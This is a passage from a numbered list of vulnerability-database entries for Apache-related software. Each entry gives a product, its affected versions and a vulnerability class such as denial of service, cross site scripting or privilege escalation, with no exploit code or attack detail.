4675| [74706] Apple MacOS X up to 10.10.2 Apache memory corruption
4676| [74705] Apple MacOS X up to 10.10.2 Apache denial of service
4677| [74704] Apple MacOS X up to 10.10.2 Apache denial of service
4678| [74703] Apple MacOS X up to 10.10.2 Apache denial of service
4679| [74702] Apple MacOS X up to 10.10.2 Apache denial of service
4680| [74701] Apple MacOS X up to 10.10.2 Apache cross site request forgery
4681| [74700] Apple MacOS X up to 10.10.2 Apache unknown vulnerability
4682| [74661] Apache Flex up to 4.14.0 asdoc index.html cross site scripting
4683| [74609] Apache Cassandra up to 1.2.19/2.0.13/2.1.3 JMX/RMI Interface privilege escalation
4684| [74469] Apache Xerces-C up to 7.0 internal/XMLReader.cpp denial of service
4685| [74468] Apache Batik up to 1.6 denial of service
4686| [74414] Apache Mod-gnutls up to 0.5.1 Authentication spoofing
4687| [74371] Apache Standard Taglibs up to 1.2.0 memory corruption
4688| [74367] Apache HTTP Server up to 2.4.12 mod_lua lua_request.c wsupgrade denial of service
4689| [74174] Apache WSS4J up to 2.0.0 privilege escalation
4690| [74172] Apache ActiveMQ up to 5.5.0 Administration Console cross site scripting
4691| [69092] Apache Tomcat up to 6.0.42/7.0.54/8.0.8 HTTP Request Smuggling privilege escalation
4692| [73831] Apache Qpid up to 0.30 Access Restriction unknown vulnerability
4693| [73731] Apache XML Security unknown vulnerability
4694| [68660] Oracle BI Publisher 10.1.3.4.2/11.1.1.7 Apache Tomcat cross site scripting
4695| [73659] Apache CloudStack up to 4.3.0 Stack-Based unknown vulnerability
4696| [73593] Apache Traffic Server up to 5.1.0 denial of service
4697| [73511] Apache POI up to 3.10 Deadlock denial of service
4698| [73510] Apache Solr up to 4.3.0 cross site scripting
4699| [68447] Apache Subversion up to 1.7.18/1.8.10 mod_dav_svn Crash denial of service
4700| [68446] Apache Subversion up to 1.7.18/1.8.10 REPORT Request Crash denial of service
4701| [73173] Apache CloudStack Stack-Based unknown vulnerability
4702| [68357] Apache Struts up to 2.3.16.3 Random Number Generator cross site request forgery
4703| [73106] Apache Hadoop up to 2.4.0 Symlink privilege escalation
4704| [68575] Apache HTTP Server up to 2.4.10 LuaAuthzProvider mod_lua.c privilege escalation
4705| [72890] Apache Qpid 0.30 unknown vulnerability
4706| [72887] Apache Hive 0.13.0 File Permission privilege escalation
4707| [72878] Apache Cordova 3.5.0 cross site request forgery
4708| [72877] Apache Cordova 3.5.0 cross site request forgery
4709| [72876] Apache Cordova 3.5.0 cross site request forgery
4710| [68435] Apache HTTP Server 2.4.10 mod_proxy_fcgi.c handle_headers denial of service
4711| [68065] Apache CXF up to 3.0.1 JAX-RS SAML denial of service
4712| [68064] Apache CXF up to 3.0.0 SAML Token denial of service
4713| [67913] Oracle Retail Markdown Optimization 12.0/13.0/13.1/13.2/13.4 Apache commons-beanutils-1.8.0.jar memory corruption
4714| [67912] Oracle Retail Invoice Matching up to 14.0 Apache commons-beanutils-1.8.0.jar memory corruption
4715| [67911] Oracle Retail Clearance Optimization Engine 13.3/13.4/14.0 Apache commons-beanutils-1.8.0.jar memory corruption
4716| [67910] Oracle Retail Allocation up to 13.2 Apache commons-beanutils-1.8.0.jar memory corruption
4717| [71835] Apache Shiro 1.0.0/1.1.0/1.2.0/1.2.1/1.2.2 unknown vulnerability
4718| [71633] Apachefriends XAMPP 1.8.1 cross site scripting
4719| [71629] Apache Axis2/C spoofing
4720| [67633] Apple Mac OS X up to 10.9.4 apache_mod_php ext/standard/dns.c dns_get_record memory corruption
4721| [67631] Apple Mac OS X up to 10.9.4 apache_mod_php Symlink memory corruption
4722| [67630] Apple Mac OS X up to 10.9.4 apache_mod_php cdf_read_property_info denial of service
4723| [67629] Apple Mac OS X up to 10.9.4 apache_mod_php cdf.c cdf_count_chain denial of service
4724| [67628] Apple Mac OS X up to 10.9.4 apache_mod_php cdf.c cdf_check_stream_offset denial of service
4725| [67627] Apple Mac OS X up to 10.9.4 apache_mod_php softmagic.c mconvert memory corruption
4726| [67626] Apple Mac OS X up to 10.9.4 apache_mod_php softmagic.c denial of service
4727| [67625] Apple Mac OS X up to 10.9.4 apache_mod_php Crash denial of service
4728| [67624] Apple Mac OS X up to 10.9.4 apache_mod_php cdf.c cdf_read_property_info denial of service
4729| [67623] Apple Mac OS X up to 10.9.4 apache_mod_php cdf.c cdf_unpack_summary_info denial of service
4730| [67622] Apple Mac OS X up to 10.9.4 apache_mod_php cdf.c cdf_read_short_sector denial of service
4731| [67620] Apple Mac OS X up to 10.9.4 apache_mod_php magic/Magdir/commands denial of service
4732| [67790] Apache HTTP Server mod_cache NULL Pointer Dereference denial of service
4733| [67522] Apache Tomcat up to 7.0.39 JSP Upload privilege escalation
4734| [70809] Apache POI up to 3.11 Crash denial of service
4735| [70808] Apache POI up to 3.10 unknown vulnerability
4736| [70806] Apache Commons-httpclient 4.2/4.2.1/4.2.2 spoofing
4737| [70749] Apache Axis up to 1.4 getCN spoofing
4738| [70701] Apache Traffic Server up to 3.3.5 denial of service
4739| [70700] Apache OFBiz up to 12.04.03 cross site scripting
4740| [67402] Apache OpenOffice 4.0.0/4.0.1/4.1.0 Calc privilege escalation
4741| [67401] Apache OpenOffice up to 4.1.0 OLE Object information disclosure
4742| [70661] Apache Subversion up to 1.6.17 denial of service
4743| [70660] Apache Subversion up to 1.6.17 spoofing
4744| [70659] Apache Subversion up to 1.6.17 spoofing
4745| [67183] Apache HTTP Server up to 2.4.9 mod_proxy denial of service
4746| [67180] Apache HTTP Server up to 2.4.9 WinNT MPM Memory Leak denial of service
4747| [67185] Apache HTTP Server up to 2.4.9 mod_status Heap-Based memory corruption
4748| [67184] Apache HTTP Server 2.4.5/2.4.6 mod_cache NULL Pointer Dereference denial of service
4749| [67182] Apache HTTP Server up to 2.4.9 mod_deflate Memory Consumption denial of service
4750| [67181] Apache HTTP Server up to 2.4.9 mod_cgid denial of service
4751| [70338] Apache Syncope up to 1.1.7 unknown vulnerability
4752| [70295] Apache CXF up to 2.7.9 Cleartext information disclosure
4753| [70106] Apache Open For Business Project up to 10.04.0 getServerError cross site scripting
4754| [70105] Apache MyFaces up to 2.1.5 JavaServer Faces directory traversal
4755| [69846] Apache HBase up to 0.94.8 information disclosure
4756| [69783] Apache CouchDB up to 1.2.0 memory corruption
4757| [13383] Apache Tomcat up to 6.0.39/7.0.53/8.0.5 XML Parser privilege escalation
4758| [13300] Apache HTTP Server 2.4.1/2.4.2 mod_wsgi setuid privilege escalation
4759| [13299] Apache HTTP Server 2.4.1/2.4.2 mod_wsgi Content-Type Header information disclosure
4760| [13164] Apache CXF up to 2.6.13/2.7.10 SOAP OutgoingChainInterceptor.java Invalid Content denial of service
4761| [13163] Apache CXF up to 2.6.13/2.7.10 SOAP HTML Content denial of service
4762| [13158] Apache Struts up to 2.3.16.2 ParametersInterceptor getClass privilege escalation
4763| [69515] Apache Struts up to 2.3.15.0 CookieInterceptor memory corruption
4764| [13086] Apache Struts up to 1.3.10 Class Loader privilege escalation
4765| [13067] Apache Struts up to 2.3.16.1 Class Loader privilege escalation
4766| [69431] Apache Archiva up to 1.3.6 cross site scripting
4767| [69385] Apache Syncope up to 1.1.6 unknown vulnerability
4768| [69338] Apache Xalan-Java up to 2.7.1 system-property unknown vulnerability
4769| [12742] Trustwave ModSecurity up to 2.7.5 Chunk Extension apache2/modsecurity.c modsecurity_tx_init privilege escalation
4770| [12741] Trustwave ModSecurity up to 2.7.6 Chunked HTTP Transfer apache2/modsecurity.c modsecurity_tx_init Trailing Header privilege escalation
4771| [13387] Apache Tomcat up to 6.0.39/7.0.53/8.0.5 Content-Length Header privilege escalation
4772| [13386] Apache Tomcat Security Manager up to 6.0.39/7.0.53/8.0.5 XSLT privilege escalation
4773| [13385] Apache Tomcat 8.0.0/8.0.1/8.0.3 AJP Request Zero Length denial of service
4774| [13384] Apache Tomcat up to 6.0.39/7.0.53/8.0.5 Chunked HTTP Request denial of service
4775| [12748] Apache CouchDB 1.5.0 UUIDS /_uuids denial of service
4776| [66739] Apache Camel up to 2.12.2 unknown vulnerability
4777| [66738] Apache Camel up to 2.12.2 unknown vulnerability
4778| [12667] Apache HTTP Server 2.4.7 mod_log_config.c log_cookie denial of service
4779| [66695] Apache CouchDB up to 1.2.0 cross site scripting
4780| [66694] Apache CouchDB up to 1.2.0 Partition partition2 directory traversal
4781| [66689] Apache HTTP Server up to 2.0.33 mod_dav dav_xml_get_cdata denial of service
4782| [12518] Apache Tomcat up to 6.0.38/7.0.49/8.0.0-RC9 HTTP Header denial of service
4783| [66498] Apache expressions up to 3.3.0 Whitelist unknown vulnerability
4784| [12781] Apache Struts up to 2.3.8 ParametersInterceptor getClass denial of service
4785| [12439] Apache Tomcat 6.0.33 XML XXE information disclosure
4786| [12438] Apache Tomcat 6.0.33/6.0.34/6.0.35/6.0.36/6.0.37 coyoteadapter.java disableURLRewriting privilege escalation
4787| [66356] Apache Wicket up to 6.8.0 information disclosure
4788| [12209] Apache Tomcat 7.0.0/7.0.50/8.0.0-RC1/8.0.1 Content-Type Header for Multi-Part Request Infinite Loop denial of service
4789| [66322] Apache ActiveMQ up to 5.8.0 cross site scripting
4790| [12291] Apache Struts up to 2.2.3 DebuggingInterceptor privilege escalation
4791| [66255] Apache Open For Business Project up to 10.04.3 cross site scripting
4792| [66200] Apache Hadoop up to 2.0.5 Security Feature information disclosure
4793| [66072] Apache CloudStack up to 4.2.0 Stack-Based unknown vulnerability
4794| [66068] Apache CloudStack up to 4.2.0 Stack-Based unknown vulnerability
4795| [11928] Oracle Secure Global Desktop up to 4.71 Apache Tomcat unknown vulnerability
4796| [11924] Oracle Secure Global Desktop up to 4.63 Apache Tomcat denial of service
4797| [11922] Oracle Secure Global Desktop up to 4.63 Apache Tomcat unknown vulnerability
4798| [66049] Apache XML Security for Java up to 1.4.6 Memory Consumption denial of service
4799| [12199] Apache Subversion up to 1.8.5 mod_dav_svn/repos.c get_resource denial of service
4800| [65946] askapache Firefox Adsense up to 3.0 askapache-firefox-adsense.php cross site request forgery
4801| [65668] Apache Solr 4.0.0 Updater denial of service
4802| [65665] Apache Solr up to 4.3.0 denial of service
4803| [65664] Apache Solr 3.6.0/3.6.1/3.6.2/4.0.0 Updater denial of service
4804| [65663] Apache Solr up to 4.5.1 ResourceLoader directory traversal
4805| [65658] Apache roller 4.0/4.0.1/5.0/5.0.1 unknown vulnerability
4806| [65657] Apache Roller 4.0/4.0.1/5.0/5.0.1 cross site scripting
4807| [11325] Apache Subversion 1.7.13 mod_dontdothat Bypass denial of service
4808| [11324] Apache Subversion up to 1.8.4 mod_dav_svn denial of service
4809| [11098] Apache Tomcat 5.5.25 HTTP Request cross site request forgery
4810| [65410] Apache Struts 2.3.15.3 cross site scripting
4811| [65386] Apache Solr up to 2.2.1 on TYPO3 cross site scripting
4812| [65385] Apache Solr up to 2.2.1 on TYPO3 unknown vulnerability
4813| [11044] Apache Struts 2.3.15.3 showConfig.action cross site scripting
4814| [11043] Apache Struts 2.3.15.3 actionNames.action cross site scripting
4815| [11018] cPanel WHM up to 11.40.0.11 Apache mod_userdir Tweak Interface privilege escalation
4816| [65342] Apache Sling 1.0.2/1.0.4/1.0.6/1.1.0/1.1.2 Auth Core cross site scripting
4817| [65340] Apache Shindig 2.5.0 information disclosure
4818| [65316] Apache Mod Fcgid up to 2.3.7 mod_fcgid fcgid_bucket.c fcgid_header_bucket_read memory corruption
4819| [65313] Apache Sling 2.2.0/2.3.0 AbstractCreateOperation.java deepGetOrCreateNode denial of service
4820| [10826] Apache Struts 2 File privilege escalation
4821| [65204] Apache Camel up to 2.10.1 unknown vulnerability
4822| [10460] Apache Struts 2.0.0/2.3.15.1 Action Mapping Mechanism Bypass privilege escalation
4823| [10459] Apache Struts 2.0.0/2.3.15 Dynamic Method Invocation unknown vulnerability
4824| [10160] Apache Subversion 1.8.0/1.8.1/1.8.2 svnwcsub.py handle_options race condition
4825| [10159] Apache Subversion up to 1.8.2 svnserve write_pid_file race condition
4826| [10158] Apache Subversion 1.8.0/1.8.1/1.8.2 daemonize.py daemon::daemonize race condition
4827| [10157] Apache Subversion up to 1.8.1 FSFS Repository Symlink privilege escalation
4828| [64808] Fail2ban up to 0.8.9 apache-auth.conf denial of service
4829| [64760] Best Practical RT up to 4.0.12 Apache::Session::File information disclosure
4830| [64722] Apache XML Security for C++ Heap-based memory corruption
4831| [64719] Apache XML Security for C++ Heap-based memory corruption
4832| [64718] Apache XML Security for C++ verify denial of service
4833| [64717] Apache XML Security for C++ getURIBaseTXFM memory corruption
4834| [64716] Apache XML Security for C++ spoofing
4835| [64701] Apache CXF up to 2.7.3 XML Parser Memory Consumption denial of service
4836| [64700] Apache CloudStack up to 4.1.0 Stack-Based cross site scripting
4837| [64667] Apache Open For Business Project up to 10.04.04 unknown vulnerability
4838| [64666] Apache Open For Business Project up to 10.04.04 cross site scripting
4839| [9891] Apache HTTP Server 2.2.22 suEXEC Feature .htaccess information disclosure
4840| [64509] Apache ActiveMQ up to 5.8.0 scheduled.jsp cross site scripting
4841| [9826] Apache Subversion up to 1.8.0 mod_dav_svn denial of service
4842| [9683] Apache HTTP Server 2.4.5 mod_session_dbd denial of service
4843| [64485] Apache Struts up to 2.2.3.0 privilege escalation
4844| [9568] Apache Struts up to 2.3.15 DefaultActionMapper cross site request forgery
4845| [9567] Apache Struts up to 2.3.15 DefaultActionMapper memory corruption
4846| [64467] Apache Geronimo 3.0 memory corruption
4847| [64466] Apache OpenJPA up to 2.2.1 Serialization memory corruption
4848| [64457] Apache Struts up to 2.2.3.0 cross site scripting
4849| [64326] Alejandro Garza Apachesolr Autocomplete up to 7.x-1.1 cross site scripting
4850| [9184] Apache Qpid up to 0.20 SSL misconfiguration
4851| [8935] Apache Subversion up to 1.7.9 FSFS Format Repository denial of service
4852| [8934] Apache Subversion up to 1.7.9 Svnserve Server denial of service
4853| [8933] Apache Subversion up to 1.6.21 check-mime-type.pl svnlook memory corruption
4854| [8932] Apache Subversion up to 1.6.21 svn-keyword-check.pl svnlook changed memory corruption
4855| [9022] Apache Struts up to 2.3.14.2 OGNL Expression memory corruption
4856| [8873] Apache Struts 2.3.14 privilege escalation
4857| [8872] Apache Struts 2.3.14 privilege escalation
4858| [8746] Apache HTTP Server Log File Terminal Escape Sequence Filtering mod_rewrite.c do_rewritelog privilege escalation
4859| [8666] Apache Tomcat up to 7.0.32 AsyncListener information disclosure
4860| [8665] Apache Tomcat up to 7.0.29 Chunked Transfer Encoding Extension Size denial of service
4861| [8664] Apache Tomcat up to 7.0.32 FORM Authentication weak authentication
4862| [64075] Apache Subversion up to 1.7.7 mod_dav_svn Crash denial of service
4863| [64074] Apache Subversion up to 1.7.8 mod_dav_svn NULL Pointer Dereference denial of service
4864| [64073] Apache Subversion up to 1.7.8 mod_dav_svn NULL Pointer Dereference denial of service
4865| [64072] Apache Subversion up to 1.7.7 mod_dav_svn NULL Pointer Dereference denial of service
4866| [64071] Apache Subversion up to 1.7.8 mod_dav_svn Memory Consumption denial of service
4867| [8768] Apache Struts up to 2.3.14 on Mac EL and OGNL Interpreter memory corruption
4868| [64006] Apache ActiveMQ up to 5.7.0 denial of service
4869| [64005] Apache ActiveMQ up to 5.7.0 Default Configuration denial of service
4870| [64004] Apache ActiveMQ up to 5.7.0 PortfolioPublishServlet.java cross site scripting
4871| [8427] Apache Tomcat Session Transaction weak authentication
4872| [63960] Apache Maven 3.0.4 Default Configuration spoofing
4873| [63751] Apache qpid up to 0.20 qpid::framing::Buffer denial of service
4874| [63750] Apache qpid up to 0.20 checkAvailable denial of service
4875| [63749] Apache Qpid up to 0.20 Memory Consumption denial of service
4876| [63748] Apache Qpid up to 0.20 Default Configuration denial of service
4877| [63747] Apache Rave up to 0.20 User Account information disclosure
4878| [7889] Apache Subversion up to 1.6.17 mod_dav_svn/svn_fs_file_length() denial of service
4879| [63646] Apache HTTP Server up to 2.2.23/2.4.3 mod_proxy_balancer.c balancer_handler cross site scripting
4880| [7688] Apache CXF up to 2.7.1 WSS4JInterceptor Bypass weak authentication
4881| [7687] Apache CXF up to 2.7.2 Token weak authentication
4882| [63334] Apache CXF up to 2.6.0 WS-Security unknown vulnerability
4883| [63299] Apache CXF up to 2.6.0 WS-Security unknown vulnerability
4884| [7202] Apache HTTP Server 2.4.2 on Oracle Solaris ld_library_path cross site scripting
4885| [7075] Apache Tomcat up to 6.0.35/7.0.27 NIO Connector NioEndpoint.java denial of service
4886| [7074] Apache Tomcat up to 6.0.35/7.0.29 FORM Authentication RealmBase.java weak authentication
4887| [7073] Apache Tomcat up to 6.0.35/7.0.31 CSRF Prevention Filter cross site request forgery
4888| [63090] Apache Tomcat up to 4.1.24 denial of service
4889| [63089] Apache HTTP Server up to 2.2.13 mod_proxy_ajp denial of service
4890| [62933] Apache Tomcat up to 5.5.0 Access Restriction unknown vulnerability
4891| [62929] Apache Tomcat up to 6.0.35/7.0.27 NIO Connector Memory Consumption denial of service
4892| [62833] Apache CXF -/2.6.0 spoofing
4893| [62832] Apache Axis2 up to 1.6.2 spoofing
4894| [62831] Apache Axis up to 1.4 Java Message Service spoofing
4895| [62830] Apache Commons-httpclient 3.0 Payments spoofing
4896| [62826] Apache Libcloud up to 0.11.0 spoofing
4897| [62757] Apache Open For Business Project up to 10.04.0 unknown vulnerability
4898| [8830] Red Hat JBoss Enterprise Application Platform 6.0.1 org.apache.catalina.connector.Response.encodeURL information disclosure
4899| [62661] Apache Axis2 unknown vulnerability
4900| [62658] Apache Axis2 unknown vulnerability
4901| [62467] Apache Qpid up to 0.17 denial of service
4902| [62417] Apache CXF 2.4.7/2.4.8/2.5.3/2.5.4/2.6.1 spoofing
4903| [6301] Apache HTTP Server mod_pagespeed cross site scripting
4904| [6300] Apache HTTP Server mod_pagespeed Hostname information disclosure
4905| [6123] Apache Wicket up to 1.5.7 Ajax Link cross site scripting
4906| [62035] Apache Struts up to 2.3.4 denial of service
4907| [61916] Apache QPID 0.5/0.6/0.14/0.16 unknown vulnerability
4908| [6998] Apache Tomcat 5.5.35/6.0.35/7.0.28 DIGEST Authentication Session State Caching privilege escalation
4909| [6997] Apache Tomcat 5.5.35/6.0.35/7.0.28 HTTP Digest Authentication Implementation privilege escalation
4910| [6092] Apache HTTP Server 2.4.0/2.4.1/2.4.2 mod_proxy_ajp.c information disclosure
4911| [6090] Apache HTTP Server 2.4.0/2.4.1/2.4.2 mod_proxy_http.c information disclosure
4912| [61507] Apache POI up to 3.8 UnhandledDataStructure denial of service
4913| [6070] Apache Struts up to 2.3.4 Token Name Configuration Parameter privilege escalation
4914| [6069] Apache Struts up to 2.3.4 Request Parameter OGNL Expression denial of service
4915| [5764] Oracle Solaris 10 Apache HTTP Server information disclosure
4916| [5700] Oracle Secure Backup 10.3.0.3/10.4.0.1 Apache denial of service
4917| [61255] Apache Hadoop 2.0.0 Kerberos unknown vulnerability
4918| [61229] Apache Sling up to 2.1.1 denial of service
4919| [61152] Apache Commons-compress 1.0/1.1/1.2/1.3/1.4 denial of service
4920| [61094] Apache Roller up to 5.0 cross site scripting
4921| [61093] Apache Roller up to 5.0 cross site request forgery
4922| [61005] Apache OpenOffice 3.3/3.4 unknown vulnerability
4923| [9673] Apache HTTP Server up to 2.4.4 mod_dav mod_dav.c Request denial of service
4924| [5436] Apache OpenOffice 3.3/3.4 WPXContentListener.cpp _closeTableRow File memory corruption
4925| [5435] Apache OpenOffice 3.3/3.4 vclmi.dll File memory corruption
4926| [60730] PHP 5.4.0/5.4.1/5.4.2 apache_request_headers memory corruption
4927| [60708] Apache Qpid 0.12 unknown vulnerability
4928| [5032] Apache Hadoop up to 0.20.205.0/1.0.1/0.23.1 Kerberos/MapReduce Security Feature privilege escalation
4929| [4949] Apache Struts File Upload XSLTResult.java XSLT File privilege escalation
4930| [4955] Apache Traffic Server 3.0.3/3.1.2 HTTP Header Parser memory corruption
4931| [4882] Apache Wicket up to 1.5.4 directory traversal
4932| [4881] Apache Wicket up to 1.4.19 cross site scripting
4933| [4884] Apache HTTP Server up to 2.3.6 mod_fcgid fcgid_spawn_ctl.c FcgidMaxProcessesPerClass HTTP Requests denial of service
4934| [60352] Apache Struts up to 2.2.3 memory corruption
4935| [60153] Apache Portable Runtime up to 1.4.3 denial of service
4936| [4598] Apache Struts 1.3.10 upload-submit.do cross site scripting
4937| [4597] Apache Struts 1.3.10 processSimple.do cross site scripting
4938| [4596] Apache Struts 2.0.14/2.2.3 struts2-rest-showcase/orders cross site scripting
4939| [4595] Apache Struts 2.0.14/2.2.3 struts2-showcase/person/editPerson.action cross site scripting
4940| [4583] Apache HTTP Server up to 2.2.21 Threaded MPM denial of service
4941| [4582] Apache HTTP Server up to 2.2.21 protocol.c information disclosure
4942| [4571] Apache Struts up to 2.3.1.2 privilege escalation
4943| [4557] Apache Tomcat up to 7.0.21 Caching/Recycling information disclosure
4944| [59934] Apache Tomcat up to 6.0.9 DigestAuthenticator.java unknown vulnerability
4945| [59933] Apache Tomcat up to 6.0.9 Access Restriction unknown vulnerability
4946| [59932] Apache Tomcat up to 6.0.9 unknown vulnerability
4947| [59931] Apache Tomcat up to 6.0.9 Access Restriction information disclosure
4948| [59902] Apache Struts up to 2.2.3 Interfaces unknown vulnerability
4949| [4528] Apache Struts up to 2.2.3 DebuggingInterceptor privilege escalation
4950| [4527] Apache Struts up to 2.2.3 ExceptionDelegator cross site scripting
4951| [59888] Apache Tomcat up to 6.0.6 denial of service
4952| [59886] Apache ActiveMQ up to 5.5.1 Crash denial of service
4953| [4513] Apache Struts up to 2.3.1 ParameterInterceptor directory traversal
4954| [4512] Apache Struts up to 2.2.3 CookieInterceptor privilege escalation
4955| [59850] Apache Geronimo up to 2.2.1 denial of service
4956| [59825] Apache HTTP Server up to 2.1.7 mod_reqtimeout denial of service
4957| [59556] Apache HTTP Server up to 2.0.53 mod_proxy information disclosure
4958| [58467] Apache libcloud 0.2.0/0.3.0/0.3.1/0.4.0 Access Restriction spoofing
4959| [58413] Apache Tomcat up to 6.0.10 spoofing
4960| [58381] Apache Wicket up to 1.4.17 cross site scripting
4961| [58296] Apache Tomcat up to 7.0.19 unknown vulnerability
4962| [57888] Apache HttpClient 4.0/4.0.1/4.1 Authorization information disclosure
4963| [57587] Apache Subversion up to 1.6.16 mod_dav_svn information disclosure
4964| [57585] Apache Subversion up to 1.6.16 mod_dav_svn Memory Consumption denial of service
4965| [57584] Apache Subversion up to 1.6.4 mod_dav_svn NULL Pointer Dereference denial of service
4966| [57577] Apache Rampart-C 1.3.0 Access Restriction rampart_timestamp_token_validate privilege escalation
4967| [57568] Apache Archiva up to 1.3.4 cross site scripting
4968| [57567] Apache Archiva up to 1.3.4 cross site request forgery
4969| [57481] Apache Tomcat 7.0.12/7.0.13 Access Restriction unknown vulnerability
4970| [4355] Apache HTTP Server APR apr_fnmatch denial of service
4971| [57435] Apache Struts up to 2.2.1.1 FileHandler.java cross site scripting
4972| [57425] Apache Struts up to 2.2.1.1 cross site scripting
4973| [4352] Apache HTTP Server 2.2.x APR apr_fnmatch denial of service
4974| [57025] Apache Tomcat up to 7.0.11 information disclosure
4975| [57024] Apache Tomcat 7.0.11 Access Restriction information disclosure
4976| [56774] IBM WebSphere Application Server up to 7.0.0.14 org.apache.jasper.runtime.JspWriterImpl.response denial of service
4977| [56824] Apache Subversion up to 1.6.4 mod_dav_svn NULL Pointer Dereference denial of service
4978| [56832] Apache Tomcat up to 7.0.10 Access Restriction information disclosure
4979| [56830] Apache Tomcat up to 7.0.9 Access Restriction privilege escalation
4980| [12440] Apache Tomcat 6.0.33 Malicious Request cross site scripting
4981| [56512] Apache Continuum up to 1.4.0 cross site scripting
4982| [4285] Apache Tomcat 5.x JVM getLocale denial of service
4983| [4284] Apache Tomcat 5.x HTML Manager Infinite Loop cross site scripting
4984| [4283] Apache Tomcat 5.x ServletContect privilege escalation
4985| [56441] Apache Tomcat up to 7.0.6 denial of service
4986| [56300] Apache CouchDB up to 1.0.1 Web Administration Interface cross site scripting
4987| [55967] Apache Subversion up to 1.6.4 rev_hunt.c denial of service
4988| [55966] Apache Subversion up to 1.6.4 mod_dav_svn repos.c walk denial of service
4989| [55095] Apache Axis2 up to 1.6 Default Password memory corruption
4990| [55631] Apache Archiva up to 1.3.1 User Account cross site request forgery
4991| [55556] Apache Tomcat up to 6.0.29 Default Configuration information disclosure
4992| [55553] Apache Tomcat up to 7.0.4 sessionsList.jsp cross site scripting
4993| [55162] Apache MyFaces up to 2.0.0 Authentication Code unknown vulnerability
4994| [54881] Apache Subversion up to 1.6.12 mod_dav_svn authz.c privilege escalation
4995| [54879] Apache APR-util up to 0.9.14 mod_reqtimeout apr_brigade_split_line denial of service
4996| [54693] Apache Traffic Server DNS Cache unknown vulnerability
4997| [54416] Apache CouchDB up to 0.11.0 cross site request forgery
4998| [54394] Apache CXF up to 2.2.8 Memory Consumption denial of service
4999| [54261] Apache Tomcat jsp/cal/cal2.jsp cross site scripting
5000| [54166] Apache HTTP Server up to 2.2.12 mod_cache Crash denial of service
5001| [54385] Apache Struts up to 2.1.8.1 ParameterInterceptor unknown vulnerability
5002| [54012] Apache Tomcat up to 6.0.10 denial of service
5003| [53763] Apache Axis2 1.3/1.4/1.4.1/1.5/1.5.1 Memory Consumption denial of service
5004| [53368] Apache MyFaces 1.1.7/1.2.8 cross site scripting
5005| [53397] Apache axis2 1.4.1/1.5.1 Administration Console cross site scripting
5006| [52894] Apache Tomcat up to 6.0.7 information disclosure
5007| [52960] Apache ActiveMQ up to 5.4-snapshot information disclosure
5008| [52843] Apache HTTP Server mod_auth_shadow unknown vulnerability
5009| [52786] Apache Open For Business Project up to 09.04 cross site scripting
5010| [52587] Apache ActiveMQ up to 5.3.0 cross site request forgery
5011| [52586] Apache ActiveMQ up to 5.3.0 cross site scripting
5012| [52584] Apache CouchDB up to 0.10.1 information disclosure
5013| [51757] Apache HTTP Server 2.0.44 cross site scripting
5014| [51756] Apache HTTP Server 2.0.44 spoofing
5015| [51717] Apache HTTP Server up to 1.3.3 mod_proxy ap_proxy_send_fb memory corruption
5016| [51690] Apache Tomcat up to 6.0 directory traversal
5017| [51689] Apache Tomcat up to 6.0 information disclosure
5018| [51688] Apache Tomcat up to 6.0 directory traversal
5019| [50886] HP Operations Manager 8.10 on Windows File Upload org.apache.catalina.manager.HTMLManagerServlet memory corruption
5020| [50802] Apache Tomcat up to 3.3 Default Password weak authentication
5021| [50626] Apache Solr 1.0.0 cross site scripting
5022| [49857] Apache HTTP Server mod_proxy_ftp cross site scripting
5023| [49856] Apache HTTP Server 2.2.13 mod_proxy_ftp ap_proxy_ftp_handler denial of service
5024| [49348] Apache Xerces-C++ 2.7.0 Stack-Based denial of service
5025| [86789] Apache Portable Runtime memory/unix/apr_pools.c unknown vulnerability
5026| [49283] Apache APR-util up to 1.3.8 apr-util misc/apr_rmm.c apr_rmm_realloc memory corruption
5027| [48952] Apache HTTP Server up to 1.3.6 mod_deflate denial of service
5028| [48626] Apache Tomcat up to 4.1.23 Access Restriction directory traversal
5029| [48431] Apache Tomcat up to 4.1.23 j_security_check cross site scripting
5030| [48430] Apache Tomcat up to 4.1.23 mod_jk denial of service
5031| [47801] Apache Geronimo 2.1/2.1.1/2.1.2/2.1.3 Administration Console cross site request forgery
5032| [47800] Apache Geronimo 2.1/2.1.1/2.1.2/2.1.3 Administration Console cross site scripting
5033| [47799] Apache Geronimo 2.1/2.1.1/2.1.2/2.1.3 Administration Console directory traversal
5034| [47648] Apache Tiles 2.1.0/2.1.1 cross site scripting
5035| [47640] Apache Struts 2.0.6/2.0.8/2.0.9/2.0.11/2.1 cross site scripting
5036| [47638] Apache Tomcat up to 4.1.23 mod_jk information disclosure
5037| [47636] Apache Struts 2.0.9 xip_client.html cross site scripting
5038| [47593] Apache Mod Perl 1 perl-status Apache::Status cross site scripting
5039| [47637] Apache Struts 1.0.2/1.1/1.2.4/1.2.7/1.2.8 cross site scripting
5040| [47239] Apache Struts up to 2.1.2 Beta struts directory traversal
5041| [47214] Apachefriends xampp 1.6.8 spoofing
5042| [47213] Apachefriends xampp 1.6.8 htaccess cross site request forgery
5043| [47162] Apachefriends XAMPP 1.4.4 weak authentication
5044| [47065] Apache Tomcat 4.1.23 cross site scripting
5045| [46834] Apache Tomcat up to 5.5.20 cross site scripting
5046| [46004] Apache Jackrabbit 1.4/1.5.0 search.jsp cross site scripting
5047| [49205] Apache Roller 2.3/3.0/3.1/4.0 Search cross site scripting
5048| [86625] Apache Struts directory traversal
5049| [44461] Apache Tomcat up to 5.5.0 information disclosure
5050| [44389] Apache Xerces-C++ XML Parser Memory Consumption denial of service
5051| [44352] Apache Friends XAMPP 1.6.8 adodb.php cross site scripting
5052| [43663] Apache Tomcat up to 6.0.16 directory traversal
5053| [43612] Apache Friends XAMPP 1.6.7 iart.php cross site scripting
5054| [43556] Apache HTTP Server up to 2.1.8 mod_proxy_ftp proxy_ftp.c cross site scripting
5055| [43516] Apache Tomcat up to 4.1.20 directory traversal
5056| [43509] Apache Tomcat up to 6.0.13 cross site scripting
5057| [42637] Apache Tomcat up to 6.0.16 cross site scripting
5058| [42325] Apache HTTP Server up to 2.1.8 Error Page cross site scripting
5059| [41838] Apache-SSL 1.3.34 1.57 expandcert privilege escalation
5060| [41091] Apache Software Foundation Mod Jk up to 2.0.1 mod_jk2 Stack-based memory corruption
5061| [40924] Apache Tomcat up to 6.0.15 information disclosure
5062| [40923] Apache Tomcat up to 6.0.15 unknown vulnerability
5063| [40922] Apache Tomcat up to 6.0 information disclosure
5064| [40710] Apache HTTP Server up to 2.0.61 mod_negotiation cross site scripting
5065| [40709] Apache HTTP Server up to 2.0.53 mod_negotiation cross site scripting
5066| [40656] Apache Tomcat 5.5.20 information disclosure
